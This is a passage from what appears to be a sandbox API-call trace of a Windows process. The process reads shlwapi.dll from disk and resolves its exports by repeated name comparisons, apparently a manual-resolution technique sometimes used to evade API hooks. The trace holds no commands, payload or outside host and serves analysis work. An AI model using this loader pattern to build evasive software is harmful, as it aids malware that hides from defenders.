lpString2="I_NetDatabaseSync2") returned 1 [0241.439] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetDfsGetVersion") returned 1 [0241.439] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetDfsIsThisADomainName") returned 1 [0241.439] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetGetDCList") returned 1 [0241.439] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetGetForestTrustInformation") returned 1 [0241.439] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonControl") returned 1 [0241.439] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonControl2") returned 1 [0241.439] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonGetDomainInfo") returned 1 [0241.440] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonSamLogoff") returned 1 [0241.440] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonSamLogon") returned 1 [0241.440] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonSamLogonEx") returned 1 [0241.440] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonSamLogonWithFlags") returned 1 [0241.440] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonSendToSam") returned 1 [0241.440] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonUasLogoff") returned 1 [0241.440] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonUasLogon") returned 1 [0241.440] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerAuthenticate") returned 1 [0241.440] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerAuthenticate2") returned 1 [0241.440] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerAuthenticate3") returned 1 [0241.440] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerGetTrustInfo") returned 1 [0241.440] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerPasswordGet") returned 1 [0241.440] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerPasswordSet") returned 1 [0241.440] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerPasswordSet2") returned 1 [0241.440] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerReqChallenge") returned 1 [0241.440] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerSetServiceBits") returned 1 [0241.440] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerSetServiceBitsEx") returned 1 [0241.440] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerTrustPasswordsGet") returned 1 [0241.440] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetlogonComputeClientDigest") returned 1 [0241.440] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetlogonComputeServerDigest") returned 1 [0241.440] lstrcmpA (lpString1="NetAccessDel", lpString2="NetAccessAdd") returned 1 [0241.440] lstrcmpA (lpString1="NetAccessDel", lpString2="NetAccessDel") returned 0 [0241.440] lstrcmpA (lpString1="NetAccessEnum", lpString2="DavAddConnection") returned 1 [0241.440] lstrcmpA (lpString1="NetAccessEnum", lpString2="DavDeleteConnection") returned 1 [0241.440] lstrcmpA (lpString1="NetAccessEnum", lpString2="DavFlushFile") returned 1 [0241.440] lstrcmpA (lpString1="NetAccessEnum", lpString2="DavGetExtendedError") returned 1 [0241.440] lstrcmpA (lpString1="NetAccessEnum", lpString2="DavGetHTTPFromUNCPath") returned 1 [0241.441] lstrcmpA (lpString1="NetAccessEnum", lpString2="DavGetUNCFromHTTPPath") returned 1 [0241.441] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsAddressToSiteNamesA") returned 1 [0241.441] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsAddressToSiteNamesExA") returned 1 [0241.441] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsAddressToSiteNamesExW") returned 1 [0241.441] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsAddressToSiteNamesW") returned 1 [0241.441] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsDeregisterDnsHostRecordsA") returned 1 [0241.441] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsDeregisterDnsHostRecordsW") returned 1 [0241.441] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsEnumerateDomainTrustsA") returned 1 [0241.441] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsEnumerateDomainTrustsW") returned 1 [0241.441] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcCloseW") returned 1 [0241.441] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcNameA") returned 1 [0241.441] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcNameW") returned 1 [0241.441] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcNameWithAccountA") returned 1 [0241.441] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcNameWithAccountW") returned 1 [0241.441] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcNextA") returned 1 [0241.441] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcNextW") returned 1 [0241.441] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcOpenA") returned 1 [0241.441] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcOpenW") returned 1 [0241.441] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcSiteCoverageA") returned 1 [0241.441] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcSiteCoverageW") returned 1 [0241.441] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetForestTrustInformationW") returned 1 [0241.441] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetSiteNameA") returned 1 [0241.441] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetSiteNameW") returned 1 [0241.441] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsMergeForestTrustInformationW") returned 1 [0241.441] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsRoleFreeMemory") returned 1 [0241.441] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsRoleGetPrimaryDomainInformation") returned 1 [0241.441] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsValidateSubnetNameA") returned 1 [0241.442] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsValidateSubnetNameW") returned 1 [0241.442] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserDebugCall") returned 1 [0241.442] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserDebugTrace") returned 1 [0241.442] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserQueryEmulatedDomains") returned 1 [0241.442] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserQueryOtherDomains") returned 1 [0241.442] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserQueryStatistics") returned 1 [0241.442] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserResetNetlogonState") returned 1 [0241.442] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserResetStatistics") returned 1 [0241.442] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserServerEnum") returned 1 [0241.442] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserSetNetlogonState") returned 1 [0241.442] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_DsUpdateReadOnlyServerDnsRecords") returned 1 [0241.442] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetAccountDeltas") returned 1 [0241.442] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetAccountSync") returned 1 [0241.442] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetChainSetClientAttributes") returned 1 [0241.442] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetChainSetClientAttributes2") returned 1 [0241.442] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetDatabaseDeltas") returned 1 [0241.442] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetDatabaseRedo") returned 1 [0241.442] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetDatabaseSync") returned 1 [0241.442] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetDatabaseSync2") returned 1 [0241.442] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetDfsGetVersion") returned 1 [0241.442] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetDfsIsThisADomainName") returned 1 [0241.442] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetGetDCList") returned 1 [0241.442] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetGetForestTrustInformation") returned 1 [0241.442] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonControl") returned 1 [0241.442] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonControl2") returned 1 [0241.443] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonGetDomainInfo") returned 1 [0241.443] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonSamLogoff") returned 1 [0241.443] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonSamLogon") returned 1 [0241.443] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonSamLogonEx") returned 1 [0241.443] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonSamLogonWithFlags") returned 1 [0241.443] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonSendToSam") returned 1 [0241.443] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonUasLogoff") returned 1 [0241.443] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonUasLogon") returned 1 [0241.443] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerAuthenticate") returned 1 [0241.443] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerAuthenticate2") returned 1 [0241.443] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerAuthenticate3") returned 1 [0241.443] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerGetTrustInfo") returned 1 [0241.443] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerPasswordGet") returned 1 [0241.443] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerPasswordSet") returned 1 [0241.443] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerPasswordSet2") returned 1 [0241.443] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerReqChallenge") returned 1 [0241.443] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerSetServiceBits") returned 1 [0241.443] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerSetServiceBitsEx") returned 1 [0241.443] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerTrustPasswordsGet") returned 1 [0241.443] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetlogonComputeClientDigest") returned 1 [0241.443] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetlogonComputeServerDigest") returned 1 [0241.443] lstrcmpA (lpString1="NetAccessEnum", lpString2="NetAccessAdd") returned 1 [0241.444] lstrcmpA (lpString1="NetAccessEnum", lpString2="NetAccessDel") returned 1 [0241.444] lstrcmpA (lpString1="NetAccessEnum", lpString2="NetAccessEnum") returned 0 [0241.444] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DavAddConnection") returned 1 [0241.444] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DavDeleteConnection") returned 1 [0241.444] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DavFlushFile") returned 1 [0241.444] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DavGetExtendedError") returned 1 [0241.444] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DavGetHTTPFromUNCPath") returned 1 [0241.444] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DavGetUNCFromHTTPPath") returned 1 [0241.444] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DsAddressToSiteNamesA") returned 1 [0241.444] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DsAddressToSiteNamesExA") returned 1 [0241.444] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DsAddressToSiteNamesExW") returned 1 [0241.451] GetProcessHeap () returned 0x550000 [0241.451] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x2d65030 | out: hHeap=0x550000) returned 1 [0241.451] GetProcessHeap () returned 0x550000 [0241.451] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x10) returned 0x569110 [0241.451] LoadLibraryA (lpLibFileName="Shlwapi.dll") returned 0x7ffc5e7b0000 [0241.451] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0241.452] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0241.452] GetModuleFileNameA (in: hModule=0x7ffc5e7b0000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")) returned 0x1f [0241.455] CreateFileA (lpFileName="C:\\Windows\\system32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0241.455] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0241.456] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0241.456] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=332104) returned 1 [0241.456] GetProcessHeap () returned 0x550000 [0241.456] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x51148) returned 0x2d65030 [0241.456] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0241.456] ReadFile (in: hFile=0x17c, lpBuffer=0x2d65030, nNumberOfBytesToRead=0x51148, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x2d65030*, lpNumberOfBytesRead=0x14f5a4*=0x51148, lpOverlapped=0x0) returned 1 [0241.731] CloseHandle (hObject=0x17c) returned 1 [0241.732] lstrcmpA (lpString1="AssocCreate", lpString2="AssocCreate") returned 0 [0241.732] lstrcmpA (lpString1="AssocGetPerceivedType", lpString2="AssocCreate") returned 1 [0241.732] lstrcmpA (lpString1="AssocGetPerceivedType", lpString2="AssocGetPerceivedType") returned 0 [0241.732] lstrcmpA (lpString1="AssocIsDangerous", lpString2="AssocCreate") returned 1 [0241.732] lstrcmpA (lpString1="AssocIsDangerous", lpString2="AssocGetPerceivedType") returned 1 [0241.732] lstrcmpA (lpString1="AssocIsDangerous", lpString2="AssocIsDangerous") returned 0 [0241.732] lstrcmpA (lpString1="AssocQueryKeyA", lpString2="AssocCreate") returned 1 [0241.732] lstrcmpA (lpString1="AssocQueryKeyA", lpString2="AssocGetPerceivedType") returned 1 [0241.732] lstrcmpA (lpString1="AssocQueryKeyA", lpString2="AssocIsDangerous") returned 1 [0241.732] lstrcmpA (lpString1="AssocQueryKeyA", lpString2="AssocQueryKeyA") returned 0 [0241.732] lstrcmpA (lpString1="AssocQueryKeyW", lpString2="AssocCreate") returned 1 [0241.733] lstrcmpA (lpString1="AssocQueryKeyW", lpString2="AssocGetPerceivedType") returned 1 [0241.733] lstrcmpA (lpString1="AssocQueryKeyW", lpString2="AssocIsDangerous") returned 1 [0241.733] lstrcmpA (lpString1="AssocQueryKeyW", lpString2="AssocQueryKeyA") returned 1 [0241.733] lstrcmpA (lpString1="AssocQueryKeyW", lpString2="AssocQueryKeyW") returned 0 [0241.733] lstrcmpA (lpString1="AssocQueryStringA", lpString2="AssocCreate") returned 1 [0241.733] lstrcmpA (lpString1="AssocQueryStringA", lpString2="AssocGetPerceivedType") returned 1 [0241.733] lstrcmpA (lpString1="AssocQueryStringA", lpString2="AssocIsDangerous") returned 1 [0241.733] lstrcmpA (lpString1="AssocQueryStringA", lpString2="AssocQueryKeyA") returned 1 [0241.733] lstrcmpA (lpString1="AssocQueryStringA", lpString2="AssocQueryKeyW") returned 1 [0241.733] lstrcmpA (lpString1="AssocQueryStringA", lpString2="AssocQueryStringA") returned 0 [0241.733] lstrcmpA (lpString1="AssocQueryStringByKeyA", lpString2="AssocCreate") returned 1 [0241.733] lstrcmpA (lpString1="AssocQueryStringByKeyA", lpString2="AssocGetPerceivedType") returned 1 [0241.733] lstrcmpA (lpString1="AssocQueryStringByKeyA", lpString2="AssocIsDangerous") returned 1 [0241.733] lstrcmpA (lpString1="AssocQueryStringByKeyA", lpString2="AssocQueryKeyA") returned 1 [0241.733] lstrcmpA (lpString1="AssocQueryStringByKeyA", lpString2="AssocQueryKeyW") returned 1 [0241.733] lstrcmpA (lpString1="AssocQueryStringByKeyA", lpString2="AssocQueryStringA") returned 1 [0241.733] lstrcmpA (lpString1="AssocQueryStringByKeyA", lpString2="AssocQueryStringByKeyA") returned 0 [0241.733] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocCreate") returned 1 [0241.733] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocGetPerceivedType") returned 1 [0241.733] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocIsDangerous") returned 1 [0241.733] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocQueryKeyA") returned 1 [0241.733] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocQueryKeyW") returned 1 [0241.733] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocQueryStringA") returned 1 [0241.733] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocQueryStringByKeyA") returned 1 [0241.734] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocQueryStringByKeyW") returned 0 [0241.734] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocCreate") returned 1 [0241.734] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocGetPerceivedType") returned 1 [0241.734] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocIsDangerous") returned 1 [0241.734] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocQueryKeyA") returned 1 [0241.734] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocQueryKeyW") returned 1 [0241.734] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocQueryStringA") returned 1 [0241.734] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocQueryStringByKeyA") returned 1 [0241.734] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocQueryStringByKeyW") returned 1 [0241.734] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocQueryStringW") returned 0 [0241.734] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocCreate") returned 1 [0241.734] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocGetPerceivedType") returned 1 [0241.734] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocIsDangerous") returned 1 [0241.734] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocQueryKeyA") returned 1 [0241.734] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocQueryKeyW") returned 1 [0241.734] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocQueryStringA") returned 1 [0241.734] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocQueryStringByKeyA") returned 1 [0241.734] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocQueryStringByKeyW") returned 1 [0241.734] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocQueryStringW") returned 1 [0241.734] lstrcmpA (lpString1="ChrCmpIA", lpString2="ChrCmpIA") returned 0 [0241.735] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocCreate") returned 1 [0241.735] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocGetPerceivedType") returned 1 [0241.735] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocIsDangerous") returned 1 [0241.735] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocQueryKeyA") returned 1 [0241.735] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocQueryKeyW") returned 1 [0241.735] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocQueryStringA") returned 1 [0241.735] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocQueryStringByKeyA") returned 1 [0241.735] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocQueryStringByKeyW") returned 1 [0241.735] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocQueryStringW") returned 1 [0241.735] lstrcmpA (lpString1="ChrCmpIW", lpString2="ChrCmpIA") returned 1 [0241.735] lstrcmpA (lpString1="ChrCmpIW", lpString2="ChrCmpIW") returned 0 [0241.735] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocCreate") returned 1 [0241.735] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocGetPerceivedType") returned 1 [0241.735] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocIsDangerous") returned 1 [0241.735] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocQueryKeyA") returned 1 [0241.735] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocQueryKeyW") returned 1 [0241.735] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocQueryStringA") returned 1 [0241.735] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocQueryStringByKeyA") returned 1 [0241.735] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocQueryStringByKeyW") returned 1 [0241.735] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocQueryStringW") returned 1 [0241.735] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="ChrCmpIA") returned 1 [0241.735] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="ChrCmpIW") returned 1 [0241.735] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="ColorAdjustLuma") returned 0 [0241.736] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocCreate") returned 1 [0241.736] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocGetPerceivedType") returned 1 [0241.736] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocIsDangerous") returned 1 [0241.736] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocQueryKeyA") returned 1 [0241.736] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocQueryKeyW") returned 1 [0241.736] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocQueryStringA") returned 1 [0241.736] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocQueryStringByKeyA") returned 1 [0241.736] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocQueryStringByKeyW") returned 1 [0241.736] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocQueryStringW") returned 1 [0241.736] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="ChrCmpIA") returned 1 [0241.736] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="ChrCmpIW") returned 1 [0241.736] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="ColorAdjustLuma") returned 1 [0241.736] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="ColorHLSToRGB") returned 0 [0241.736] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocCreate") returned 1 [0241.736] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocGetPerceivedType") returned 1 [0241.737] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocIsDangerous") returned 1 [0241.737] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocQueryKeyA") returned 1 [0241.737] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocQueryKeyW") returned 1 [0241.737] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocQueryStringA") returned 1 [0241.737] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocQueryStringByKeyA") returned 1 [0241.737] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocQueryStringByKeyW") returned 1 [0241.737] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocQueryStringW") returned 1 [0241.737] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="ChrCmpIA") returned 1 [0241.737] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="ChrCmpIW") returned 1 [0241.737] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="ColorAdjustLuma") returned 1 [0241.737] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="ColorHLSToRGB") returned 1 [0241.737] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="ColorRGBToHLS") returned 0 [0241.737] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocCreate") returned 1 [0241.737] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocGetPerceivedType") returned 1 [0241.737] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocIsDangerous") returned 1 [0241.737] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocQueryKeyA") returned 1 [0241.737] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocQueryKeyW") returned 1 [0241.737] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocQueryStringA") returned 1 [0241.737] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocQueryStringByKeyA") returned 1 [0241.737] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocQueryStringByKeyW") returned 1 [0241.737] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocQueryStringW") returned 1 [0241.737] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="ChrCmpIA") returned 1 [0241.737] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="ChrCmpIW") returned 1 [0241.737] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="ColorAdjustLuma") returned 1 [0241.737] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="ColorHLSToRGB") returned 1 [0241.737] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="ColorRGBToHLS") returned 1 [0241.737] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="ConnectToConnectionPoint") returned 0 [0241.737] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocCreate") returned 1 [0241.738] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocGetPerceivedType") returned 1 [0241.738] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocIsDangerous") returned 1 [0241.738] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocQueryKeyA") returned 1 [0241.738] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocQueryKeyW") returned 1 [0241.738] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocQueryStringA") returned 1 [0241.738] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocQueryStringByKeyA") returned 1 [0241.738] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocQueryStringByKeyW") returned 1 [0241.738] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocQueryStringW") returned 1 [0241.738] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="ChrCmpIA") returned 1 [0241.738] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="ChrCmpIW") returned 1 [0241.738] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="ColorAdjustLuma") returned 1 [0241.738] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="ColorHLSToRGB") returned 1 [0241.738] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="ColorRGBToHLS") returned 1 [0241.738] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="ConnectToConnectionPoint") returned 1 [0241.738] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="DelayLoadFailureHook") returned 0 [0241.738] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocCreate") returned 1 [0241.738] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocGetPerceivedType") returned 1 [0241.738] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocIsDangerous") returned 1 [0241.738] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocQueryKeyA") returned 1 [0241.738] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocQueryKeyW") returned 1 [0241.738] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocQueryStringA") returned 1 [0241.738] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocQueryStringByKeyA") returned 1 [0241.738] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocQueryStringByKeyW") returned 1 [0241.738] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocQueryStringW") returned 1 [0241.738] lstrcmpA (lpString1="DllGetClassObject", lpString2="ChrCmpIA") returned 1 [0241.738] lstrcmpA (lpString1="DllGetClassObject", lpString2="ChrCmpIW") returned 1 [0241.738] lstrcmpA (lpString1="DllGetClassObject", lpString2="ColorAdjustLuma") returned 1 [0241.738] lstrcmpA (lpString1="DllGetClassObject", lpString2="ColorHLSToRGB") returned 1 [0241.738] lstrcmpA (lpString1="DllGetClassObject", lpString2="ColorRGBToHLS") returned 1 [0241.738] lstrcmpA (lpString1="DllGetClassObject", lpString2="ConnectToConnectionPoint") returned 1 [0241.738] lstrcmpA (lpString1="DllGetClassObject", lpString2="DelayLoadFailureHook") returned 1 [0241.738] lstrcmpA 